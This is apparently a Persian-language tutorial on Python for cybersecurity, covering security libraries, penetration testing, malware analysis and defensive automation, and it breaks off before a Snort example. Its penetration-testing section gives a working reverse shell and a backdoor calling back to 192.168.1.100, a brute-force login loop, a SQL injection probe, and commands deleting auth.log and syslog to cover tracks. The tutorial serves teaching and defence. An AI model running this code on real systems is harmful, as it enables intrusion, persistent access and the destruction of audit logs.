زمان مطالعه: 14 دقیقه

در دنیای امروزی که تهدیدات سایبری به‌طور مداوم در حال گسترش و پیچیده‌تر شدن هستند، استفاده از ابزارهای قدرتمند برای مقابله با این تهدیدات ضروری است. پایتون یکی از محبوب‌ترین زبان‌های برنامه‌نویسی در حوزه امنیت سایبری محسوب می‌شود که به دلیل سادگی، خوانایی بالا و قابلیت‌های گسترده، توسط محققان امنیتی، متخصصان تست نفوذ و تحلیل‌گران بدافزار مورد استفاده قرار می‌گیرد. این زبان با ارائه کتابخانه‌ها و ماژول‌های قدرتمند، امکان انجام وظایفی مانند تحلیل شبکه، اکسپلویت‌نویسی، رمزنگاری داده‌ها، تست نفوذ و خودکارسازی فرآیندهای امنیتی را فراهم می‌کند. بسیاری از هکرهای کلاه‌سفید و متخصصان امنیت از پایتون برای کشف آسیب‌پذیری‌ها و تقویت امنیت سیستم‌ها استفاده می‌کنند.

در این مقاله، به بررسی کاربردهای پایتون در امنیت سایبری خواهیم پرداخت و ابزارهای کلیدی آن را معرفی خواهیم کرد. ابتدا به دلایل محبوبیت این زبان در دنیای امنیت پرداخته و سپس مهم‌ترین کتابخانه‌ها و فریمورک‌های مورد استفاده در این حوزه را بررسی خواهیم کرد. علاوه بر این، مثال‌های عملی از تست نفوذ، تحلیل بدافزار، اسکن شبکه و خودکارسازی امنیت ارائه خواهیم داد تا درک بهتری از قدرت پایتون در این زمینه پیدا کنید. اگر شما یک محقق امنیتی، تستر نفوذ یا علاقه‌مند به یادگیری هک اخلاقی هستید، این مقاله راهنمایی جامع برای شما خواهد بود.

۱. چرا پایتون برای امنیت سایبری مناسب است؟

پایتون به یکی از زبان‌های برنامه‌نویسی اصلی در دنیای امنیت سایبری تبدیل شده است. این محبوبیت به دلیل ویژگی‌های خاص این زبان و توانایی آن در حل مسائل پیچیده امنیتی به روشی ساده و کارآمد است. در ادامه به دلایلی که پایتون را به گزینه‌ای ایده‌آل برای تست نفوذ، تحلیل بدافزار و سایر فعالیت‌های امنیتی تبدیل کرده است، می‌پردازیم:

۱.۱ سینتکس ساده و یادگیری آسان

پایتون به دلیل سینتکس خوانا و ساختار ساده‌اش، یادگیری آن برای افراد تازه‌وارد و همچنین متخصصان امنیتی که قصد دارند به‌سرعت اسکریپت‌نویسی را یاد بگیرند، آسان است. بر خلاف زبان‌های پیچیده‌تری مانند C یا Assembly، پایتون نیازی به مدیریت سطح پایین حافظه ندارد و این امر باعث افزایش سرعت توسعه ابزارهای امنیتی می‌شود.

۱.۲ کتابخانه‌ها و ماژول‌های گسترده

پایتون دارای مجموعه‌ای غنی از کتابخانه‌ها و ماژول‌ها برای انجام وظایف مختلف در امنیت سایبری است. این کتابخانه‌ها، کار توسعه‌دهندگان را ساده کرده و نیاز به نوشتن کد از ابتدا را کاهش می‌دهند. برخی از مهم‌ترین کتابخانه‌های مرتبط با امنیت سایبری شامل:

• Scapy: برای تحلیل بسته‌های شبکه و اسکن آسیب‌پذیری‌ها
• Requests: برای ارسال درخواست‌های HTTP و بررسی امنیت وب‌سایت‌ها
• Cryptography: برای رمزنگاری و رمزگشایی داده‌ها
• Pwntools: برای نوشتن اکسپلویت و انجام حملات تست نفوذ
• Nmap: برای اسکن شبکه و کشف پورت‌های باز

۱.۳ قابلیت چندمنظوره و سازگاری بالا

پایتون در محیط‌های مختلفی مانند ویندوز، لینوکس و مک قابل اجرا است. این ویژگی، آن را به گزینه‌ای ایده‌آل برای توسعه ابزارهای تست نفوذ، تحلیل بدافزار و خودکارسازی فرآیندهای امنیتی تبدیل می‌کند. علاوه بر این، امکان استفاده از پایتون در کنار سایر زبان‌ها مانند C و Assembly وجود دارد که برای انجام تحلیل‌های سطح پایین روی بدافزارها یا نوشتن ماژول‌های پیشرفته ضروری است.

۱.۴ خودکارسازی وظایف امنیتی

بسیاری از وظایف امنیتی، مانند اسکن شبکه، مانیتورینگ ترافیک، تحلیل فایل‌های لاگ و مدیریت آسیب‌پذیری‌ها، نیازمند انجام عملیات تکراری و زمان‌بر هستند. پایتون با قابلیت اسکریپت‌نویسی قوی خود، امکان خودکارسازی این فرآیندها را فراهم می‌کند. به عنوان مثال، می‌توان از پایتون برای شناسایی تلاش‌های ورود غیرمجاز، بررسی حملات بروت فورس یا مانیتورینگ تغییرات فایل‌های حساس استفاده کرد.

۱.۵ پشتیبانی گسترده و جامعه فعال

پایتون دارای یک جامعه بزرگ از توسعه‌دهندگان و متخصصان امنیتی است که به اشتراک‌گذاری ابزارها، اسکریپت‌ها و تجربیات خود می‌پردازند. این جامعه فعال باعث می‌شود که ابزارهای امنیتی به‌سرعت توسعه یافته و به‌روز شوند. همچنین، منابع آموزشی فراوانی برای یادگیری استفاده از پایتون در امنیت سایبری وجود دارد که به کاربران کمک می‌کند تا مهارت‌های خود را تقویت کنند.

۱.۶ ادغام با ابزارهای امنیتی معروف

پایتون به راحتی می‌تواند با ابزارهای امنیتی معروف مانند Metasploit، Burp Suite، Wireshark و Nmap ادغام شود. این امکان به متخصصان امنیت اجازه می‌دهد تا تست‌های نفوذ پیچیده‌تری را انجام داده و نتایج را به صورت خودکار پردازش کنند.

۱.۷ قدرت در تحلیل بدافزار و مهندسی معکوس

پایتون به عنوان یک ابزار قدرتمند در تحلیل بدافزار و مهندسی معکوس نیز استفاده می‌شود. بسیاری از تحلیل‌گران امنیتی از پایتون برای بررسی کدهای مخرب، شبیه‌سازی رفتار بدافزارها، تجزیه و تحلیل داده‌های رمزگذاری‌شده و دیباگ کردن نرم‌افزارهای مشکوک استفاده می‌کنند.

۱.۸ پشتیبانی از هک اخلاقی و تست نفوذ

پایتون به طور گسترده در تست نفوذ و هک اخلاقی مورد استفاده قرار می‌گیرد. از این زبان برای نوشتن اسکریپت‌های اختصاصی برای کشف آسیب‌پذیری‌ها، انجام حملات Brute-force، اجرای حملات Man-in-the-Middle (MITM) و حتی توسعه اکسپلویت‌ها استفاده می‌شود.

پایتون به دلیل سادگی، انعطاف‌پذیری، پشتیبانی از کتابخانه‌های امنیتی قدرتمند و قابلیت خودکارسازی، به یکی از محبوب‌ترین زبان‌ها در حوزه امنیت سایبری تبدیل شده است. چه در تست نفوذ، چه در تحلیل بدافزار و چه در رمزنگاری، پایتون می‌تواند به متخصصان امنیت کمک کند تا وظایف خود را سریع‌تر و کارآمدتر انجام دهند. اگر قصد ورود به دنیای امنیت سایبری را دارید، یادگیری پایتون می‌تواند یکی از بهترین سرمایه‌گذاری‌های شما باشد.

۲. ابزارهای پایتونی برای امنیت سایبری

پایتون به دلیل پشتیبانی از کتابخانه‌های گسترده و فریمورک‌های قدرتمند، یکی از محبوب‌ترین زبان‌های برنامه‌نویسی در حوزه امنیت سایبری است. این ابزارها می‌توانند برای تحلیل ترافیک شبکه، اسکن آسیب‌پذیری‌ها، رمزنگاری داده‌ها، تست نفوذ، مهندسی معکوس و خودکارسازی فرآیندهای امنیتی استفاده شوند. در این بخش، به معرفی مهم‌ترین ابزارها و کتابخانه‌های پایتونی که در امنیت سایبری کاربرد دارند، می‌پردازیم.

۲.۱ Scapy – تحلیل و دستکاری بسته‌های شبکه

Scapy یک کتابخانه‌ی قدرتمند برای تحلیل بسته‌های شبکه، اسکن آسیب‌پذیری‌ها، و انجام حملات تست نفوذ است. با استفاده از این ابزار می‌توان بسته‌های سفارشی ایجاد کرده، آنها را ارسال کرده و پاسخ‌ها را تحلیل کرد.

نمونه کد: ارسال یک بسته ICMP (Ping) به یک IP خاص

from scapy.all import IP, ICMP, send

packet = IP(dst="192.168.1.1") / ICMP()
send(packet)

✅ کاربردها:

• اسکن شبکه
• حملات Man-in-the-Middle (MITM)
• جعل بسته‌های شبکه (Packet Spoofing)
• شبیه‌سازی حملات

۲.۲ Requests – آزمایش امنیت وب و ارسال درخواست‌های HTTP

Requests یکی از پرکاربردترین کتابخانه‌های پایتونی برای ارسال درخواست‌های HTTP است. این ابزار به متخصصان امنیت کمک می‌کند تا تست‌های امنیتی روی وب‌سایت‌ها انجام داده و آسیب‌پذیری‌های احتمالی را بررسی کنند.

نمونه کد: ارسال یک درخواست GET به یک سایت هدف

import requests

response = requests.get("http://example.com")
print(response.text)

✅ کاربردها:

• آزمایش آسیب‌پذیری‌های وب (مانند SQL Injection)
• جمع‌آوری اطلاعات از وب‌سایت‌ها (Web Scraping)
• اجرای حملات Brute-force روی فرم‌های ورود

۲.۳ Cryptography – رمزنگاری داده‌ها

برای رمزنگاری و محافظت از اطلاعات، می‌توان از کتابخانه‌ی Cryptography استفاده کرد. این ابزار امکان رمزگذاری و رمزگشایی امن داده‌ها را فراهم می‌کند.

نمونه کد: رمزگذاری و رمزگشایی متن با استفاده از الگوریتم Fernet

from cryptography.fernet import Fernet

key = Fernet.generate_key()
cipher = Fernet(key)

encrypted_text = cipher.encrypt(b"Hello, world!")
decrypted_text = cipher.decrypt(encrypted_text)

print("Encrypted:", encrypted_text)
print("Decrypted:", decrypted_text)

✅ کاربردها:

• رمزگذاری و ذخیره‌سازی ایمن اطلاعات
• تولید و مدیریت کلیدهای رمزنگاری
• تحلیل و کرک کردن رمزگذاری‌ها در تحقیقات امنیتی

۲.۴ Pwntools – تست نفوذ و اکسپلویت‌نویسی

Pwntools یکی از مهم‌ترین ابزارهای تست نفوذ و نوشتن اکسپلویت‌ها است که معمولاً در مسابقات CTF و تحلیل آسیب‌پذیری‌ها استفاده می‌شود.

نمونه کد: برقراری ارتباط با یک سرور از راه دور و ارسال داده

from pwn import *

p = remote('example.com', 1337)
p.sendline(b'Hello, Server!')
print(p.recv())

✅ کاربردها:

• توسعه اکسپلویت برای باینری‌های آسیب‌پذیر
• تعامل با سرورهای راه دور در حملات نفوذ
• مهندسی معکوس برنامه‌های آسیب‌پذیر

۲.۵ Nmap – اسکن شبکه و کشف پورت‌های باز

Nmap یکی از محبوب‌ترین ابزارهای اسکن شبکه است. با استفاده از ماژول python-nmap می‌توان از طریق پایتون، شبکه‌ها را اسکن و اطلاعاتی درباره میزبان‌ها و پورت‌های باز دریافت کرد.

نمونه کد: اسکن پورت‌های ۲۲ تا ۴۴۳ در یک IP خاص

import nmap

scanner = nmap.PortScanner()
scanner.scan('192.168.1.1', '22-443')

for host in scanner.all_hosts():
    print(f"Host: {host}, State: {scanner[host].state()}")

✅ کاربردها:

• اسکن شبکه برای شناسایی پورت‌های باز
• بررسی امنیت سرورها
• شناسایی سرویس‌های در حال اجرا

۲.۶ Impacket – اجرای حملات شبکه‌ای و دستکاری پروتکل‌ها

Impacket یک مجموعه ابزار پیشرفته برای تعامل با پروتکل‌های شبکه مانند SMB، RDP و LDAP است.

نمونه کد: اجرای درخواست SMB به یک سرور هدف

from impacket.smbconnection import SMBConnection

conn = SMBConnection("192.168.1.10", "192.168.1.10")
conn.login("guest", "")
shares = conn.listShares()
for share in shares:
    print(share['shi1_netname'])

✅ کاربردها:

• اجرای حملات Pass-the-Hash
• اکسپلویت آسیب‌پذیری‌های SMB و RDP
• تعامل با پروتکل‌های شبکه برای تست نفوذ

۲.۷ NetfilterQueue – فیلتر و تغییر بسته‌های شبکه در حین عبور

NetfilterQueue به متخصصان امنیت اجازه می‌دهد که بسته‌های شبکه را دریافت کرده، تغییر دهند و مجدداً ارسال کنند. این ابزار برای انجام حملات MITM و تحلیل ترافیک شبکه مفید است.

نمونه کد: رهگیری و تغییر ترافیک شبکه

from netfilterqueue import NetfilterQueue

def process_packet(packet):
    print(packet.get_payload())  # مشاهده بسته دریافتی
    packet.accept()  # ارسال مجدد بسته به مقصد

nfqueue = NetfilterQueue()
nfqueue.bind(1, process_packet)
nfqueue.run()

✅ کاربردها:

• شنود و تغییر ترافیک شبکه
• اجرای حملات Man-in-the-Middle
• تحلیل داده‌های ارسال‌شده از طریق پروتکل‌های مختلف

پایتون به دلیل داشتن کتابخانه‌ها و ابزارهای قدرتمند، به یکی از بهترین زبان‌ها برای امنیت سایبری تبدیل شده است. از تحلیل شبکه و اسکن آسیب‌پذیری‌ها گرفته تا تست نفوذ و رمزنگاری، ابزارهای پایتونی می‌توانند کار متخصصان امنیت را ساده‌تر کرده و به آنها در اجرای حملات شبیه‌سازی‌شده و شناسایی نقاط ضعف کمک کنند. یادگیری این ابزارها و استفاده از آنها در پروژه‌های امنیتی، مهارت‌های شما را در حوزه امنیت سایبری به سطح بالاتری ارتقا خواهد داد.

۳. تست نفوذ با پایتون

تست نفوذ (Penetration Testing) فرآیندی است که در آن یک سیستم، شبکه یا برنامه برای شناسایی آسیب‌پذیری‌ها مورد بررسی قرار می‌گیرد. پایتون یکی از بهترین زبان‌های برنامه‌نویسی برای اجرای تست نفوذ است، زیرا دارای کتابخانه‌های متعددی برای اسکن شبکه، بررسی آسیب‌پذیری‌ها، شبیه‌سازی حملات و اکسپلویت‌نویسی است. در این بخش، به بررسی روش‌های مختلف تست نفوذ با استفاده از پایتون پرداخته و نمونه کدهایی برای اجرای حملات ارائه می‌دهیم.

۳.۱ مراحل تست نفوذ با پایتون

تست نفوذ معمولاً شامل چندین مرحله است که با استفاده از ابزارهای پایتونی قابل اجرا هستند:

1. جمع‌آوری اطلاعات (Reconnaissance): جمع‌آوری داده درباره هدف، مانند دامنه، آدرس‌های IP و سرویس‌های فعال.
2. اسکن و کشف آسیب‌پذیری (Scanning & Enumeration): بررسی شبکه و شناسایی پورت‌ها و سرویس‌های باز.
3. بهره‌برداری (Exploitation): سوءاستفاده از آسیب‌پذیری‌های کشف‌شده برای نفوذ به سیستم.
4. دسترسی و حفظ حضور (Post-Exploitation): ایجاد دسترسی پایدار به سیستم نفوذ شده.
5. پاک کردن ردپاها (Covering Tracks): حذف لاگ‌ها و پنهان‌سازی فعالیت‌ها برای جلوگیری از شناسایی.

۳.۲ جمع‌آوری اطلاعات (Information Gathering)

۳.۲.۱ یافتن اطلاعات دامنه با پایتون

یکی از مراحل مهم در تست نفوذ، شناسایی اطلاعات دامنه هدف است. با استفاده از whois می‌توان اطلاعاتی مانند نام مالک، سرورهای DNS و تاریخ ثبت دامنه را دریافت کرد.

import whois

domain = whois.whois("example.com")
print(domain)

✅ کاربردها:

• کشف اطلاعات عمومی درباره دامنه
• بررسی مالکیت دامنه
• یافتن اطلاعات مرتبط با زیرساخت هدف

۳.۳ اسکن و کشف آسیب‌پذیری‌ها

۳.۳.۱ اسکن پورت‌ها با Nmap در پایتون

با استفاده از python-nmap می‌توان پورت‌های باز یک سرور را اسکن کرد و سرویس‌های در حال اجرا را شناسایی کرد.

import nmap

scanner = nmap.PortScanner()
scanner.scan("192.168.1.1", "22-443")

for host in scanner.all_hosts():
    print(f"Host: {host}, State: {scanner[host].state()}")
    for proto in scanner[host].all_protocols():
        ports = scanner[host][proto].keys()
        for port in ports:
            print(f"Port: {port}, State: {scanner[host][proto][port]['state']}")

✅ کاربردها:

• شناسایی پورت‌های باز
• کشف سرویس‌های فعال روی سیستم هدف
• بررسی امنیت شبکه و سرویس‌ها

۳.۳.۲ اسکن آسیب‌پذیری‌های وب با Requests

با استفاده از requests می‌توان بررسی کرد که آیا یک وب‌سایت در برابر حملات SQL Injection آسیب‌پذیر است یا نه.

import requests

url = "http://example.com/login.php?user=admin' OR '1'='1"
response = requests.get(url)

if "Welcome" in response.text:
    print("SQL Injection vulnerability detected!")
else:
    print("No vulnerability found.")

✅ کاربردها:

• کشف آسیب‌پذیری‌های SQL Injection
• تست نفوذ روی فرم‌های ورود
• بررسی امنیت وب‌سایت‌ها

۳.۴ بهره‌برداری (Exploitation) با پایتون

۳.۴.۱ حمله بروت فورس روی صفحه ورود

با استفاده از requests می‌توان یک حمله Brute-force روی صفحه ورود یک وب‌سایت انجام داد.

import requests

url = "http://example.com/login.php"
user = "admin"
passwords = ["123456", "password", "admin123", "letmein"]

for password in passwords:
    data = {"username": user, "password": password}
    response = requests.post(url, data=data)
    
    if "Welcome" in response.text:
        print(f"Login successful with password: {password}")
        break
    else:
        print(f"Failed attempt with password: {password}")

✅ کاربردها:

• کرک کردن پسوردهای ضعیف
• تست امنیت صفحات ورود
• بررسی استفاده از رمزهای رایج

۳.۴.۲ اجرای کد از راه دور با پایتون

در برخی از تست‌های نفوذ، لازم است که یک کد مخرب روی سیستم هدف اجرا شود. این کد می‌تواند برای ایجاد یک Reverse Shell استفاده شود.

import socket
import subprocess

host = "192.168.1.100"
port = 4444

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

while True:
    command = s.recv(1024).decode()
    if command.lower() == "exit":
        break
    output = subprocess.getoutput(command)
    s.send(output.encode())

s.close()

✅ کاربردها:

• اجرای دستورات از راه دور روی سیستم هدف
• تست نفوذ به سیستم‌های ناامن
• بررسی حملات دسترسی غیرمجاز

۳.۵ حفظ دسترسی و حملات Post-Exploitation

پس از نفوذ موفق، یک هکر تلاش می‌کند دسترسی خود را حفظ کند. یکی از روش‌های معمول برای این کار، ایجاد یک Backdoor است.

۳.۵.۱ ایجاد یک Backdoor ساده با پایتون

import socket
import os

host = "192.168.1.100"
port = 5555

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

while True:
    command = s.recv(1024).decode()
    if command.lower() == "exit":
        break
    output = os.popen(command).read()
    s.send(output.encode())

s.close()

✅ کاربردها:

• دسترسی مداوم به سیستم
• اجرای دستورات از راه دور
• شبیه‌سازی حملات APT (Advanced Persistent Threat)

۳.۶ پاک کردن ردپاها (Covering Tracks)

پس از اجرای حمله، پاک کردن لاگ‌ها و آثار نفوذ برای جلوگیری از شناسایی ضروری است.

نمونه کد: حذف لاگ‌های سیستم در لینوکس

import os

os.system("rm -rf /var/log/auth.log")
os.system("rm -rf /var/log/syslog")

✅ کاربردها:

• پنهان کردن فعالیت‌های مخرب
• جلوگیری از شناسایی در تست نفوذ
• شبیه‌سازی حملات پیشرفته

پایتون یکی از قوی‌ترین ابزارهای موجود برای تست نفوذ است. با استفاده از کتابخانه‌ها و تکنیک‌های ذکر شده، متخصصان امنیت می‌توانند شبکه‌ها و برنامه‌ها را برای کشف آسیب‌پذیری‌ها بررسی کرده و آنها را برطرف کنند. در عین حال، این ابزارها باید فقط در تست‌های قانونی و اخلاقی استفاده شوند، زیرا استفاده غیرمجاز از آنها می‌تواند پیامدهای قانونی داشته باشد.

۴. تحلیل بدافزار با پایتون

تحلیل بدافزار (Malware Analysis) یکی از مهم‌ترین حوزه‌های امنیت سایبری است که شامل بررسی و تجزیه و تحلیل بدافزارها برای شناسایی رفتار، عملکرد و روش‌های مخرب آن‌ها می‌شود. پایتون به دلیل کتابخانه‌های گسترده و قابلیت‌های بالا در پردازش داده، مهندسی معکوس و خودکارسازی، یکی از بهترین زبان‌ها برای تحلیل بدافزارها محسوب می‌شود. در این بخش، به روش‌های مختلف تحلیل بدافزار با پایتون پرداخته و ابزارها و نمونه کدهای مرتبط را ارائه می‌دهیم.

۴.۱ انواع تحلیل بدافزار

تحلیل بدافزار به دو روش کلی انجام می‌شود:

۴.۱.۱ تحلیل ایستا (Static Analysis)

در این روش، بدون اجرای بدافزار، فایل بررسی شده و ویژگی‌های آن مانند نام تابع‌ها، رشته‌های متنی، آدرس‌های IP و کتابخانه‌های مورد استفاده استخراج می‌شود.

✅ ابزارها و تکنیک‌ها:

• بررسی هش فایل
• استخراج رشته‌های متنی
• بررسی ایمپورت‌ها و وابستگی‌های باینری
• بررسی متادیتای فایل

۴.۱.۲ تحلیل پویا (Dynamic Analysis)

در این روش، بدافزار در یک محیط ایزوله (مانند ماشین مجازی) اجرا شده و رفتار آن بررسی می‌شود.

✅ ابزارها و تکنیک‌ها:

• مانیتورینگ تغییرات سیستم
• بررسی ارتباطات شبکه‌ای
• رهگیری فعالیت‌های بدافزار در حافظه
• لاگ‌گیری از رفتار بدافزار

۴.۲ استخراج اطلاعات اولیه از بدافزار

۴.۲.۱ بررسی هش فایل برای شناسایی بدافزار

یکی از روش‌های ساده برای بررسی اولیه یک فایل مشکوک، محاسبه هش آن است. بسیاری از پایگاه‌های داده امنیتی مانند VirusTotal از هش فایل برای شناسایی بدافزارها استفاده می‌کنند.

نمونه کد برای محاسبه هش MD5، SHA1 و SHA256 یک فایل:

import hashlib

def get_hash(file_path):
    hashes = {"MD5": hashlib.md5(), "SHA1": hashlib.sha1(), "SHA256": hashlib.sha256()}
    
    with open(file_path, "rb") as f:
        while chunk := f.read(4096):
            for h in hashes.values():
                h.update(chunk)
    
    return {name: h.hexdigest() for name, h in hashes.items()}

file_path = "malware.exe"
hashes = get_hash(file_path)

for algo, hash_value in hashes.items():
    print(f"{algo}: {hash_value}")

✅ کاربردها:

• بررسی هش بدافزار و مقایسه آن با پایگاه‌های داده مانند VirusTotal
• تشخیص تغییرات در نسخه‌های مختلف بدافزار
• جلوگیری از اجرای مجدد بدافزار با هشینگ

۴.۳ استخراج رشته‌های مخفی از بدافزار

بدافزارها معمولاً شامل رشته‌های متنی پنهان‌شده‌ای هستند که می‌توانند شامل آدرس‌های سرور C2، نام فایل‌های مهم و کلیدهای رمزگذاری باشند.

نمونه کد برای استخراج رشته‌های متنی از فایل باینری:

import re

def extract_strings(file_path):
    with open(file_path, "rb") as f:
        data = f.read()
    strings = re.findall(b"[ -~]{4,}", data)  # حداقل ۴ کاراکتر قابل خواندن
    return [s.decode(errors="ignore") for s in strings]

file_path = "malware.exe"
strings = extract_strings(file_path)

for s in strings[:50]:  # نمایش ۵۰ رشته اول
    print(s)

✅ کاربردها:

• کشف آدرس‌های IP، URLها و نام‌های دامنه در بدافزار
• شناسایی کلیدهای رمزگذاری و دستورات مخرب
• بررسی تکنیک‌های مبهم‌سازی در بدافزار

۴.۴ بررسی ایمپورت‌ها و وابستگی‌های بدافزار

با بررسی توابع و کتابخانه‌هایی که بدافزار استفاده می‌کند، می‌توان فهمید که چه عملیاتی را انجام می‌دهد.

نمونه کد برای نمایش کتابخانه‌های وارد شده در یک فایل PE (Windows EXE):

from pefile import PE

def get_imports(file_path):
    pe = PE(file_path)
    for entry in pe.DIRECTORY_ENTRY_IMPORT:
        print(f"Library: {entry.dll.decode()}")
        for imp in entry.imports:
            print(f"  {imp.name.decode() if imp.name else 'Unknown'}")

file_path = "malware.exe"
get_imports(file_path)

✅ کاربردها:

• شناسایی وابستگی‌های بدافزار به APIهای ویندوز
• تشخیص قابلیت‌های شبکه‌ای، فایل‌نویسی و رجیستری بدافزار
• بررسی روش‌های بایپس آنتی‌ویروس‌ها

۴.۵ تحلیل رفتار بدافزار در سیستم

۴.۵.۱ مانیتورینگ تغییرات سیستم در زمان اجرا

یکی از راه‌های شناسایی رفتار بدافزار، نظارت بر تغییراتی است که در فایل‌ها و رجیستری ایجاد می‌کند.

نمونه کد برای نظارت بر تغییرات فایل در یک مسیر خاص:

import time
import os

watch_dir = "C:\\Users\\Public\\"
before = set(os.listdir(watch_dir))

while True:
    time.sleep(5)
    after = set(os.listdir(watch_dir))
    created_files = after - before
    deleted_files = before - after

    if created_files:
        print(f"New files: {created_files}")
    if deleted_files:
        print(f"Deleted files: {deleted_files}")

    before = after

✅ کاربردها:

• تشخیص فعالیت‌های مخرب مانند ایجاد فایل‌های مخفی
• شناسایی تغییرات رجیستری توسط بدافزار
• تحلیل تکنیک‌های بقای بدافزار (Persistence)

۴.۶ تحلیل ارتباطات شبکه‌ای بدافزار

۴.۶.۱ بررسی ارتباطات مشکوک با Wireshark و Scapy

بدافزارها معمولاً با سرورهای کنترل و فرمان (C2) ارتباط برقرار می‌کنند. با استفاده از Scapy می‌توان ترافیک شبکه را شنود کرد.

نمونه کد برای شنود بسته‌های شبکه:

from scapy.all import sniff

def packet_callback(packet):
    if packet.haslayer("IP"):
        print(f"Packet from {packet[IP].src} to {packet[IP].dst}")

sniff(prn=packet_callback, count=10)

✅ کاربردها:

• کشف ارتباطات مخفی بدافزار با سرورهای C2
• تشخیص پروتکل‌های ارتباطی استفاده شده توسط بدافزار
• بررسی تکنیک‌های استگانوگرافی و رمزگذاری بدافزار

۴.۷ مهندسی معکوس بدافزار با دی‌کامپایلرهای پایتونی

۴.۷.۱ دی‌کامپایل کردن فایل‌های اجرایی پایتونی

اگر بدافزار با پایتون نوشته شده باشد، می‌توان با ابزار uncompyle6 کد منبع آن را بازیابی کرد.

نمونه کد برای دی‌کامپایل کردن یک فایل pyc:

uncompyle6 -o . malware.pyc

✅ کاربردها:

• استخراج کد منبع بدافزارهای پایتونی
• بررسی تکنیک‌های مبهم‌سازی (Obfuscation)
• تغییر و بررسی کد مخرب

پایتون ابزارهای قدرتمندی برای تحلیل بدافزارها ارائه می‌دهد که می‌توانند در تحلیل ایستا، تحلیل پویا، مانیتورینگ سیستم و مهندسی معکوس استفاده شوند. تحلیل‌گران امنیت سایبری با استفاده از این روش‌ها می‌توانند رفتار بدافزارها را شناسایی کرده و از تهدیدات جلوگیری کنند.

۵. خودکارسازی امنیت با پایتون

خودکارسازی امنیت سایبری با پایتون یکی از مهم‌ترین راهکارها برای افزایش بهره‌وری و کاهش خطاهای انسانی در فرآیندهای امنیتی است. با استفاده از پایتون، می‌توان کارهای تکراری امنیتی مانند اسکن آسیب‌پذیری‌ها، بررسی لاگ‌ها، شناسایی تهدیدات، مدیریت فایروال و پاسخگویی به حوادث را خودکار کرد. این کار نه‌تنها باعث افزایش سرعت و دقت می‌شود، بلکه به تیم‌های امنیتی کمک می‌کند تا زمان بیشتری را صرف تحلیل‌های پیشرفته کنند.

در این بخش، به کاربردهای مهم خودکارسازی امنیت سایبری با پایتون پرداخته و نمونه‌هایی از پیاده‌سازی آن را ارائه می‌دهیم.

۵.۱ چرا خودکارسازی امنیت سایبری اهمیت دارد؟

✅ افزایش سرعت و دقت: اسکن دستی شبکه‌ها، بررسی لاگ‌ها و تحلیل تهدیدات زمان‌بر است. خودکارسازی این فرآیندها باعث افزایش سرعت و کاهش خطاها می‌شود.

✅ شناسایی تهدیدات در لحظه: با اسکریپت‌های پایتونی، می‌توان حملات سایبری مانند حملات Brute-force، بدافزارها و تهدیدات شبکه‌ای را در لحظه تشخیص داد.

✅ کاهش بار کاری تیم امنیتی: بسیاری از وظایف امنیتی مانند بررسی لاگ‌ها، تحلیل هش‌های فایل و مدیریت دسترسی‌ها، با پایتون به‌صورت خودکار انجام می‌شود و نیاز به مداخله انسانی را کاهش می‌دهد.

✅ ایجاد واکنش سریع به حملات: با پایتون می‌توان اسکریپت‌هایی برای شناسایی تهدیدات و اجرای اقدامات مقابله‌ای مانند مسدود کردن IPهای مخرب یا خاموش کردن سیستم‌های آلوده نوشت.

۵.۲ کاربردهای خودکارسازی امنیت با پایتون

۵.۲.۱ خودکارسازی اسکن آسیب‌پذیری‌ها

با استفاده از کتابخانه‌هایی مانند nmap و shodan، می‌توان به‌صورت خودکار شبکه را برای کشف آسیب‌پذیری‌ها اسکن کرد.

🔹 نمونه کد برای اسکن پورت‌های باز با Nmap در پایتون:

import nmap

def scan_ports(target):
    scanner = nmap.PortScanner()
    scanner.scan(target, "1-65535")
    
    for host in scanner.all_hosts():
        print(f"Host: {host}, State: {scanner[host].state()}")
        for proto in scanner[host].all_protocols():
            ports = scanner[host][proto].keys()
            for port in ports:
                print(f"Port: {port}, State: {scanner[host][proto][port]['state']}")

scan_ports("192.168.1.1")

✅ کاربرد:

• شناسایی پورت‌های باز و سرویس‌های در حال اجرا
• بررسی آسیب‌پذیری‌های سیستم و شبکه
• خودکارسازی اسکن‌های دوره‌ای امنیتی

۵.۲.۲ مانیتورینگ لاگ‌های سیستم به‌صورت خودکار

بررسی لاگ‌های سیستم به‌صورت دستی، زمان زیادی می‌برد. با پایتون، می‌توان به‌طور خودکار لاگ‌ها را پردازش و تهدیدات را شناسایی کرد.

🔹 نمونه کد برای بررسی لاگ‌های ورود غیرمجاز در سیستم لینوکس:

import re

log_file = "/var/log/auth.log"

def check_failed_logins():
    with open(log_file, "r") as f:
        logs = f.readlines()
    
    for line in logs:
        if "Failed password" in line:
            ip = re.search(r"(\d+\.\d+\.\d+\.\d+)", line)
            if ip:
                print(f"Suspicious login attempt from: {ip.group()}")

check_failed_logins()

✅ کاربرد:

• شناسایی تلاش‌های ورود ناموفق به سیستم
• تشخیص حملات Brute-force
• ارسال هشدارهای امنیتی خودکار

۵.۲.۳ مسدود کردن آدرس‌های IP مخرب به‌صورت خودکار

اگر سیستم شما مورد حمله قرار گیرد، می‌توان با پایتون و iptables به‌طور خودکار آدرس‌های IP مخرب را مسدود کرد.

🔹 نمونه کد برای بلاک کردن IPهای مشکوک در لینوکس:

import os

def block_ip(ip):
    command = f"iptables -A INPUT -s {ip} -j DROP"
    os.system(command)
    print(f"Blocked IP: {ip}")

block_ip("192.168.1.100")

✅ کاربرد:

• مسدود کردن مهاجمان پس از چندین تلاش ناموفق ورود
• جلوگیری از حملات DDoS
• افزایش امنیت سرورها

۵.۲.۴ بررسی و شناسایی بدافزارها در سیستم

با استفاده از VirusTotal API، می‌توان فایل‌های مشکوک را اسکن کرد و مشخص کرد که آیا حاوی بدافزار هستند یا نه.

🔹 نمونه کد برای ارسال هش فایل به VirusTotal:

import requests

API_KEY = "YOUR_VIRUSTOTAL_API_KEY"
file_hash = "d41d8cd98f00b204e9800998ecf8427e"

url = f"https://www.virustotal.com/api/v3/files/{file_hash}"
headers = {"x-apikey": API_KEY}

response = requests.get(url, headers=headers)
print(response.json())

✅ کاربرد:

• بررسی فایل‌های مشکوک برای شناسایی بدافزارها
• ادغام با سیستم‌های امنیتی برای اسکن خودکار فایل‌ها
• تشخیص سریع تهدیدات پیش از اجرا

۵.۲.۵ خودکارسازی تشخیص حملات شبکه با Snort و پایتون

Snort یکی از ابزارهای قدرتمند تشخیص نفوذ (IDS) است که می‌توان آن را با پایتون ترکیب کرد.

🔹 نمونه کد برای بررسی هشدارهای Snort و ارسال هشدار ایمیلی در صورت شناسایی تهدید:

